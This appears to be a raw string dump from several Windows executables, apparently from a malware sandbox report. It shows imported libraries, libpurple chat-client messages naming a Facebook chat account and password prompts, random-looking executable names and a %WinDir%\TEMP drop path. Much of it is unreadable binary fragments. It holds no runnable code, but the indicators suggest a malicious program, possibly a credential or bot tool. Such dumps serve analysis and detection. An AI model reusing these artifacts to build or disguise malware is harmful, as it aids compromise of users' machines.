unknown option -- %c

option requires an argument -- %s

option requires an argument -- %c

GCC: (GNU) 4.8.2 20131016 (Fedora MinGW 4.8.2-1.fc20)

439377800910733

ReportEventA

PeekNamedPipe

_acmdln

_amsg_exit

GetProcessWindowStation

ldap_msgfree

ADVAPI32.dll

KERNEL32.dll

msvcrt.dll

USER32.dll

wldap32.dll

WS2_32.dll

"@"@"@"@

File: %ws, Line %u

purple.exe_2604:

.text

P`.data

.rdata

0@.bss

.idata

libgcc_s_dw2-1.dll

libgcj-13.dll

User "%s" (%s) has sent a buddy request

Connection disconnected: "%s" (%s)

>Error: %d

PURPLE_DISCONNECT_REASON %s

(%H:%M:%S)

(%s) %s %s: %s

buddy %s is now %s

Account connected: %s %s

@chat.facebook.com

PURPLE_GOT_BUDDY %s

Please report this!

%d,%s

Select the protocol: [0-%d]:

Enter the password:

Failed to read password.

VirtualQuery failed for %d bytes at address %p

Unknown pseudo relocation protocol version %d.

Unknown pseudo relocation bit size %d.

GCC: (GNU) 4.8.1

sebastianconstantinbaciu@chat.facebook.com

purple_account_set_password

libglib-2.0-0.dll

libgthread-2.0-0.dll

libpurple.dll

kernel32.dll

msvcrt.dll

glhljywourzj.exe_2816:

.text

`.rdata

@.data

QSSSSSSh

SQSSSh

YrR.Vf

-.pX>

SSSh0

SPSSSh

SSShp/C

tFSSSh

t)SSShP

SSShP

SSShp

SSShp&C

t\SSSh

vSSSh

FTPjK

FtPj;

C.PjRV

tGHt.Ht&

WS2_32.dll

OLEAUT32.dll

cmd.exe

Please contact the application's support team for more information.

- Attempt to initialize the CRT more than once.

- CRT not initialized

- floating point support not loaded

portuguese-brazilian

operator

GetProcessWindowStation

USER32.DLL

GDI32.dll

GetProcessHeap

KERNEL32.dll

USER32.dll

GetCPInfo

GetConsoleOutputCP

unovkkdak.exe

zj.exe

eityzygishyx.exe

o8.OLnzG

.LlqI

Y:\Bp

%s _\(

?_.eg]

Ì>$

By.Ix

j.mSd

%u 0a

zcÁ

%Documents and Settings%\LocalService

%WinDir%\TEMP\glhljywourzj.exe

mscoree.dll

KERNEL32.DLL